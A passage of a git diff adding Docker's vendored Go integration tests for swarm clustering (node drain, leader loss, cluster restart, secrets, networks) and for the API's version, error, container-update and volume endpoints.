d1.checkLeader, checker.IsNil) + + d1.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "top1" + }) + + c.Assert(d3.Stop(), checker.IsNil) + + // make sure there is a leader + waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + + var service swarm.Service + simpleTestService(&service) + service.Spec.Name 
= "top2" + status, out, err := d1.SockRequest("POST", "/services/create", service.Spec) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("deadline exceeded", string(out))) + + c.Assert(d2.Start(), checker.IsNil) + + // make sure there is a leader + waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + + d1.createService(c, simpleTestService, func(s *swarm.Service) { + s.Spec.Name = "top3" + }) +} + +func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + nodes := d1.listNodes(c) + c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) + +loop0: + for _, n := range nodes { + for _, d := range []*SwarmDaemon{d1, d2, d3} { + if n.ID == d.NodeID { + continue loop0 + } + } + c.Errorf("unknown nodeID %v", n.ID) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + nodes := d.listNodes(c) + + d.updateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityPause + }) + + n := d.getNode(c, nodes[0].ID) + c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause) +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) { + testRequires(c, Network) + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + _ = s.AddDaemon(c, true, false) + + nodes := d1.listNodes(c) + c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) + + // Getting the info so we can take the NodeID + d2Info, err := d2.info() + c.Assert(err, checker.IsNil) + + // forceful removal of d2 should work + d1.removeNode(c, d2Info.NodeID, true) + + nodes = d1.listNodes(c) + c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) + + // Restart the node that was removed + err = d2.Restart() + c.Assert(err, 
checker.IsNil) + + // Give some time for the node to rejoin + time.Sleep(1 * time.Second) + + // Make sure the node didn't rejoin + nodes = d1.listNodes(c) + c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) +} + +func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks + + // start a service, expect balanced distribution + instances := 8 + id := d1.createService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + + // drain d2, all containers should move to d1 + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityDrain + }) + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0) + + // set d2 back to active + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityActive + }) + + instances = 1 + d1.updateService(c, d1.getService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + + instances = 8 + d1.updateService(c, d1.getService(c, id), setInstances(instances)) + + // drained node first so we don't get any old containers + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) + 
waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + + d2ContainerCount := len(d2.activeContainers()) + + // set d2 to paused, scale service up, only d1 gets new tasks + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityPause + }) + + instances = 14 + d1.updateService(c, d1.getService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances-d2ContainerCount) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, d2ContainerCount) + +} + +func (s *DockerSwarmSuite) TestAPISwarmLeaveRemovesContainer(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + d.createService(c, simpleTestService, setInstances(instances)) + + id, err := d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, checker.IsNil) + id = strings.TrimSpace(id) + + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances+1) + + c.Assert(d.Leave(false), checker.NotNil) + c.Assert(d.Leave(true), checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + id2, err := d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + c.Assert(id, checker.HasPrefix, strings.TrimSpace(id2)) +} + +// #23629 +func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) { + testRequires(c, Network) + s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, false, false) + + id, err := d2.Cmd("run", "-d", "busybox", "top") + c.Assert(err, checker.IsNil) + id = strings.TrimSpace(id) + + err = d2.Join(swarm.JoinRequest{ + RemoteAddrs: []string{"123.123.123.123:1234"}, + }) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), 
checker.Contains, "Timeout was reached") + + info, err := d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStatePending) + + c.Assert(d2.Leave(true), checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1) + + id2, err := d2.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + c.Assert(id, checker.HasPrefix, strings.TrimSpace(id2)) +} + +// #23705 +func (s *DockerSwarmSuite) TestAPISwarmRestoreOnPendingJoin(c *check.C) { + testRequires(c, Network) + d := s.AddDaemon(c, false, false) + err := d.Join(swarm.JoinRequest{ + RemoteAddrs: []string{"123.123.123.123:1234"}, + }) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "Timeout was reached") + + waitAndAssert(c, defaultReconciliationTimeout, d.checkLocalNodeState, checker.Equals, swarm.LocalNodeStatePending) + + c.Assert(d.Stop(), checker.IsNil) + c.Assert(d.Start(), checker.IsNil) + + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) +} + +func (s *DockerSwarmSuite) TestAPISwarmManagerRestore(c *check.C) { + d1 := s.AddDaemon(c, true, true) + + instances := 2 + id := d1.createService(c, simpleTestService, setInstances(instances)) + + d1.getService(c, id) + d1.Stop() + d1.Start() + d1.getService(c, id) + + d2 := s.AddDaemon(c, true, true) + d2.getService(c, id) + d2.Stop() + d2.Start() + d2.getService(c, id) + + d3 := s.AddDaemon(c, true, true) + d3.getService(c, id) + d3.Stop() + d3.Start() + d3.getService(c, id) + + d3.Kill() + time.Sleep(1 * time.Second) // time to handle signal + d3.Start() + d3.getService(c, id) +} + +func (s *DockerSwarmSuite) TestAPISwarmScaleNoRollingUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + id := d.createService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, 
checker.Equals, instances) + containers := d.activeContainers() + instances = 4 + d.updateService(c, d.getService(c, id), setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + containers2 := d.activeContainers() + +loop0: + for _, c1 := range containers { + for _, c2 := range containers2 { + if c1 == c2 { + continue loop0 + } + } + c.Errorf("container %v not found in new set %#v", c1, containers2) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmInvalidAddress(c *check.C) { + d := s.AddDaemon(c, false, false) + req := swarm.InitRequest{ + ListenAddr: "", + } + status, _, err := d.SockRequest("POST", "/swarm/init", req) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + + req2 := swarm.JoinRequest{ + ListenAddr: "0.0.0.0:2377", + RemoteAddrs: []string{""}, + } + status, _, err = d.SockRequest("POST", "/swarm/join", req2) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) +} + +func (s *DockerSwarmSuite) TestAPISwarmForceNewCluster(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + + instances := 2 + id := d1.createService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + + // drain d2, all containers should move to d1 + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Availability = swarm.NodeAvailabilityDrain + }) + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0) + + c.Assert(d2.Stop(), checker.IsNil) + + c.Assert(d1.Init(swarm.InitRequest{ + ForceNewCluster: true, + Spec: swarm.Spec{}, + }), checker.IsNil) + + waitAndAssert(c, 
defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) + + d3 := s.AddDaemon(c, true, true) + info, err := d3.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.True) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + instances = 4 + d3.updateService(c, d3.getService(c, id), setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) +} + +func simpleTestService(s *swarm.Service) { + ureplicas := uint64(1) + restartDelay := time.Duration(100 * time.Millisecond) + + s.Spec = swarm.ServiceSpec{ + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: "busybox:latest", + Command: []string{"/bin/top"}, + }, + RestartPolicy: &swarm.RestartPolicy{ + Delay: &restartDelay, + }, + }, + Mode: swarm.ServiceMode{ + Replicated: &swarm.ReplicatedService{ + Replicas: &ureplicas, + }, + }, + } + s.Spec.Name = "top" +} + +func serviceForUpdate(s *swarm.Service) { + ureplicas := uint64(1) + restartDelay := time.Duration(100 * time.Millisecond) + + s.Spec = swarm.ServiceSpec{ + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: "busybox:latest", + Command: []string{"/bin/top"}, + }, + RestartPolicy: &swarm.RestartPolicy{ + Delay: &restartDelay, + }, + }, + Mode: swarm.ServiceMode{ + Replicated: &swarm.ReplicatedService{ + Replicas: &ureplicas, + }, + }, + UpdateConfig: &swarm.UpdateConfig{ + Parallelism: 2, + Delay: 4 * time.Second, + FailureAction: swarm.UpdateFailureActionContinue, + }, + } + s.Spec.Name = "updatetest" +} + +func setInstances(replicas int) serviceConstructor { + ureplicas := uint64(replicas) + return func(s *swarm.Service) { + s.Spec.Mode = swarm.ServiceMode{ + Replicated: &swarm.ReplicatedService{ + Replicas: &ureplicas, + }, + } + } +} + +func setImage(image string) serviceConstructor { + return 
func(s *swarm.Service) { + s.Spec.TaskTemplate.ContainerSpec.Image = image + } +} + +func setFailureAction(failureAction string) serviceConstructor { + return func(s *swarm.Service) { + s.Spec.UpdateConfig.FailureAction = failureAction + } +} + +func setMaxFailureRatio(maxFailureRatio float32) serviceConstructor { + return func(s *swarm.Service) { + s.Spec.UpdateConfig.MaxFailureRatio = maxFailureRatio + } +} + +func setParallelism(parallelism uint64) serviceConstructor { + return func(s *swarm.Service) { + s.Spec.UpdateConfig.Parallelism = parallelism + } +} + +func setConstraints(constraints []string) serviceConstructor { + return func(s *swarm.Service) { + if s.Spec.TaskTemplate.Placement == nil { + s.Spec.TaskTemplate.Placement = &swarm.Placement{} + } + s.Spec.TaskTemplate.Placement.Constraints = constraints + } +} + +func setGlobalMode(s *swarm.Service) { + s.Spec.Mode = swarm.ServiceMode{ + Global: &swarm.GlobalService{}, + } +} + +func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount int) { + var totalMCount, totalWCount int + + for _, d := range cl { + var ( + info swarm.Info + err error + ) + + // check info in a waitAndAssert, because if the cluster doesn't have a leader, `info` will return an error + checkInfo := func(c *check.C) (interface{}, check.CommentInterface) { + info, err = d.info() + return err, check.Commentf("cluster not ready in time") + } + waitAndAssert(c, defaultReconciliationTimeout, checkInfo, checker.IsNil) + if !info.ControlAvailable { + totalWCount++ + continue + } + + var leaderFound bool + totalMCount++ + var mCount, wCount int + + for _, n := range d.listNodes(c) { + waitReady := func(c *check.C) (interface{}, check.CommentInterface) { + if n.Status.State == swarm.NodeStateReady { + return true, nil + } + nn := d.getNode(c, n.ID) + n = *nn + return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.Info.NodeID) + } + waitAndAssert(c, 
defaultReconciliationTimeout, waitReady, checker.True) + + waitActive := func(c *check.C) (interface{}, check.CommentInterface) { + if n.Spec.Availability == swarm.NodeAvailabilityActive { + return true, nil + } + nn := d.getNode(c, n.ID) + n = *nn + return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.Info.NodeID) + } + waitAndAssert(c, defaultReconciliationTimeout, waitActive, checker.True) + + if n.Spec.Role == swarm.NodeRoleManager { + c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, d.Info.NodeID)) + if n.ManagerStatus.Leader { + leaderFound = true + } + mCount++ + } else { + c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.Info.NodeID)) + wCount++ + } + } + c.Assert(leaderFound, checker.True, check.Commentf("lack of leader reported by node %s", info.NodeID)) + c.Assert(mCount, checker.Equals, managerCount, check.Commentf("managers count reported by node %s", info.NodeID)) + c.Assert(wCount, checker.Equals, workerCount, check.Commentf("workers count reported by node %s", info.NodeID)) + } + c.Assert(totalMCount, checker.Equals, managerCount) + c.Assert(totalWCount, checker.Equals, workerCount) +} + +func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { + mCount, wCount := 5, 1 + + var nodes []*SwarmDaemon + for i := 0; i < mCount; i++ { + manager := s.AddDaemon(c, true, true) + info, err := manager.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.True) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + nodes = append(nodes, manager) + } + + for i := 0; i < wCount; i++ { + worker := s.AddDaemon(c, true, false) + info, err := worker.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, 
swarm.LocalNodeStateActive) + nodes = append(nodes, worker) + } + + // stop whole cluster + { + var wg sync.WaitGroup + wg.Add(len(nodes)) + errs := make(chan error, len(nodes)) + + for _, d := range nodes { + go func(daemon *SwarmDaemon) { + defer wg.Done() + if err := daemon.Stop(); err != nil { + errs <- err + } + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + daemon.root = filepath.Dir(daemon.root) + } + }(d) + } + wg.Wait() + close(errs) + for err := range errs { + c.Assert(err, check.IsNil) + } + } + + // start whole cluster + { + var wg sync.WaitGroup + wg.Add(len(nodes)) + errs := make(chan error, len(nodes)) + + for _, d := range nodes { + go func(daemon *SwarmDaemon) { + defer wg.Done() + if err := daemon.Start("--iptables=false"); err != nil { + errs <- err + } + }(d) + } + wg.Wait() + close(errs) + for err := range errs { + c.Assert(err, check.IsNil) + } + } + + checkClusterHealth(c, nodes, mCount, wCount) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateWithName(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + id := d.createService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + + service := d.getService(c, id) + instances = 5 + + setInstances(instances)(service) + url := fmt.Sprintf("/services/%s/update?version=%d", service.Spec.Name, service.Version.Index) + status, out, err := d.SockRequest("POST", url, service.Spec) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) +} + +func (s *DockerSwarmSuite) TestAPISwarmSecretsEmptyList(c *check.C) { + d := s.AddDaemon(c, true, true) + + secrets := d.listSecrets(c) + c.Assert(secrets, checker.NotNil) + c.Assert(len(secrets), checker.Equals, 0, check.Commentf("secrets: %#v", secrets)) +} + 
+func (s *DockerSwarmSuite) TestAPISwarmSecretsCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secrets := d.listSecrets(c) + c.Assert(len(secrets), checker.Equals, 1, check.Commentf("secrets: %#v", secrets)) + name := secrets[0].Spec.Annotations.Name + c.Assert(name, checker.Equals, testName, check.Commentf("secret: %s", name)) +} + +func (s *DockerSwarmSuite) TestAPISwarmSecretsDelete(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.ID, checker.Equals, id, check.Commentf("secret: %v", secret)) + + d.deleteSecret(c, secret.ID) + status, out, err := d.SockRequest("GET", "/secrets/"+id, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound, check.Commentf("secret delete: %s", string(out))) +} + +// Test case for 30242, where duplicate networks, with different drivers `bridge` and `overlay`, +// caused both scopes to be `swarm` for `docker network inspect` and `docker network ls`. +// This test makes sure the fixes correctly output scopes instead. 
+func (s *DockerSwarmSuite) TestAPIDuplicateNetworks(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "foo" + networkCreateRequest := types.NetworkCreateRequest{ + Name: name, + NetworkCreate: types.NetworkCreate{ + CheckDuplicate: false, + }, + } + + var n1 types.NetworkCreateResponse + networkCreateRequest.NetworkCreate.Driver = "bridge" + + status, out, err := d.SockRequest("POST", "/networks/create", networkCreateRequest) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out))) + + c.Assert(json.Unmarshal(out, &n1), checker.IsNil) + + var n2 types.NetworkCreateResponse + networkCreateRequest.NetworkCreate.Driver = "overlay" + + status, out, err = d.SockRequest("POST", "/networks/create", networkCreateRequest) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(out))) + + c.Assert(json.Unmarshal(out, &n2), checker.IsNil) + + var r1 types.NetworkResource + + status, out, err = d.SockRequest("GET", "/networks/"+n1.ID, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out))) + + c.Assert(json.Unmarshal(out, &r1), checker.IsNil) + + c.Assert(r1.Scope, checker.Equals, "local") + + var r2 types.NetworkResource + + status, out, err = d.SockRequest("GET", "/networks/"+n2.ID, nil) + c.Assert(err, checker.IsNil, check.Commentf(string(out))) + c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(out))) + + c.Assert(json.Unmarshal(out, &r2), checker.IsNil) + + c.Assert(r2.Scope, checker.Equals, "swarm") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go new file mode 100644 index 0000000000..3b38ba96f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_test.go @@ 
-0,0 +1,118 @@ +package main + +import ( + "fmt" + "net/http" + "net/http/httptest" + "runtime" + "strconv" + "strings" + + "github.com/docker/docker/api" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPIOptionsRoute(c *check.C) { + status, _, err := sockRequest("OPTIONS", "/", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) +} + +func (s *DockerSuite) TestAPIGetEnabledCORS(c *check.C) { + res, body, err := sockRequestRaw("GET", "/version", nil, "") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + body.Close() + // TODO: @runcom incomplete tests, why old integration tests had this headers + // and here none of the headers below are in the response? + //c.Log(res.Header) + //c.Assert(res.Header.Get("Access-Control-Allow-Origin"), check.Equals, "*") + //c.Assert(res.Header.Get("Access-Control-Allow-Headers"), check.Equals, "Origin, X-Requested-With, Content-Type, Accept, X-Registry-Auth") +} + +func (s *DockerSuite) TestAPIClientVersionOldNotSupported(c *check.C) { + if daemonPlatform != runtime.GOOS { + c.Skip("Daemon platform doesn't match test platform") + } + if api.MinVersion == api.DefaultVersion { + c.Skip("API MinVersion==DefaultVersion") + } + v := strings.Split(api.MinVersion, ".") + vMinInt, err := strconv.Atoi(v[1]) + c.Assert(err, checker.IsNil) + vMinInt-- + v[1] = strconv.Itoa(vMinInt) + version := strings.Join(v, ".") + + status, body, err := sockRequest("GET", "/v"+version+"/version", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + expected := fmt.Sprintf("client version %s is too old. 
Minimum supported API version is %s, please upgrade your client to a newer version", version, api.MinVersion) + c.Assert(strings.TrimSpace(string(body)), checker.Contains, expected) +} + +func (s *DockerSuite) TestAPIDockerAPIVersion(c *check.C) { + var svrVersion string + + server := httptest.NewServer(http.HandlerFunc( + func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("API-Version", api.DefaultVersion) + url := r.URL.Path + svrVersion = url + })) + defer server.Close() + + // Test using the env var first + result := icmd.RunCmd(icmd.Cmd{ + Command: binaryWithArgs("-H="+server.URL[7:], "version"), + Env: appendBaseEnv(false, "DOCKER_API_VERSION=xxx"), + }) + c.Assert(result, icmd.Matches, icmd.Expected{Out: "API version: xxx", ExitCode: 1}) + c.Assert(svrVersion, check.Equals, "/vxxx/version", check.Commentf("%s", result.Compare(icmd.Success))) +} + +func (s *DockerSuite) TestAPIErrorJSON(c *check.C) { + httpResp, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(`{}`), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json") + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(getErrorMessage(c, b), checker.Equals, "Config cannot be empty in order to create a container") +} + +func (s *DockerSuite) TestAPIErrorPlainText(c *check.C) { + // Windows requires API 1.25 or later. This test is validating a behaviour which was present + // in v1.23, but changed in 1.24, hence not applicable on Windows. 
See apiVersionSupportsJSONErrors + testRequires(c, DaemonIsLinux) + httpResp, body, err := sockRequestRaw("POST", "/v1.23/containers/create", strings.NewReader(`{}`), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusInternalServerError) + c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain") + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(string(b)), checker.Equals, "Config cannot be empty in order to create a container") +} + +func (s *DockerSuite) TestAPIErrorNotFoundJSON(c *check.C) { + // 404 is a different code path to normal errors, so test separately + httpResp, body, err := sockRequestRaw("GET", "/notfound", nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound) + c.Assert(httpResp.Header.Get("Content-Type"), checker.Equals, "application/json") + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(getErrorMessage(c, b), checker.Equals, "page not found") +} + +func (s *DockerSuite) TestAPIErrorNotFoundPlainText(c *check.C) { + httpResp, body, err := sockRequestRaw("GET", "/v1.23/notfound", nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(httpResp.StatusCode, checker.Equals, http.StatusNotFound) + c.Assert(httpResp.Header.Get("Content-Type"), checker.Contains, "text/plain") + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(string(b)), checker.Equals, "page not found") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go new file mode 100644 index 0000000000..dfe14ec7b0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go @@ -0,0 +1,35 @@ +// +build !windows + +package main + +import ( + "strings" + + 
"github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPIUpdateContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + + name := "apiUpdateContainer" + hostConfig := map[string]interface{}{ + "Memory": 314572800, + "MemorySwap": 524288000, + } + dockerCmd(c, "run", "-d", "--name", name, "-m", "200M", "busybox", "top") + _, _, err := sockRequest("POST", "/containers/"+name+"/update", hostConfig) + c.Assert(err, check.IsNil) + + c.Assert(inspectField(c, name, "HostConfig.Memory"), checker.Equals, "314572800") + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + out, _ := dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "314572800") + + c.Assert(inspectField(c, name, "HostConfig.MemorySwap"), checker.Equals, "524288000") + file = "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes" + out, _ = dockerCmd(c, "exec", name, "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "524288000") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go new file mode 100644 index 0000000000..eb2de5904a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go @@ -0,0 +1,23 @@ +package main + +import ( + "encoding/json" + "net/http" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestGetVersion(c *check.C) { + status, body, err := sockRequest("GET", "/version", nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + var v types.Version + + c.Assert(json.Unmarshal(body, &v), checker.IsNil) + + c.Assert(v.Version, checker.Equals, dockerversion.Version, 
check.Commentf("Version mismatch")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go new file mode 100644 index 0000000000..d1d44005e0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go @@ -0,0 +1,89 @@ +package main + +import ( + "encoding/json" + "net/http" + "path/filepath" + + "github.com/docker/docker/api/types" + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestVolumesAPIList(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + dockerCmd(c, "run", "-v", prefix+"/foo", "busybox") + + status, b, err := sockRequest("GET", "/volumes", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var volumes volumetypes.VolumesListOKBody + c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) + + c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) +} + +func (s *DockerSuite) TestVolumesAPICreate(c *check.C) { + config := volumetypes.VolumesCreateBody{ + Name: "test", + } + status, b, err := sockRequest("POST", "/volumes/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b))) + + var vol types.Volume + err = json.Unmarshal(b, &vol) + c.Assert(err, checker.IsNil) + + c.Assert(filepath.Base(filepath.Dir(vol.Mountpoint)), checker.Equals, config.Name) +} + +func (s *DockerSuite) TestVolumesAPIRemove(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + dockerCmd(c, "run", "-v", prefix+"/foo", "--name=test", "busybox") + + status, b, err := sockRequest("GET", "/volumes", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var volumes volumetypes.VolumesListOKBody + 
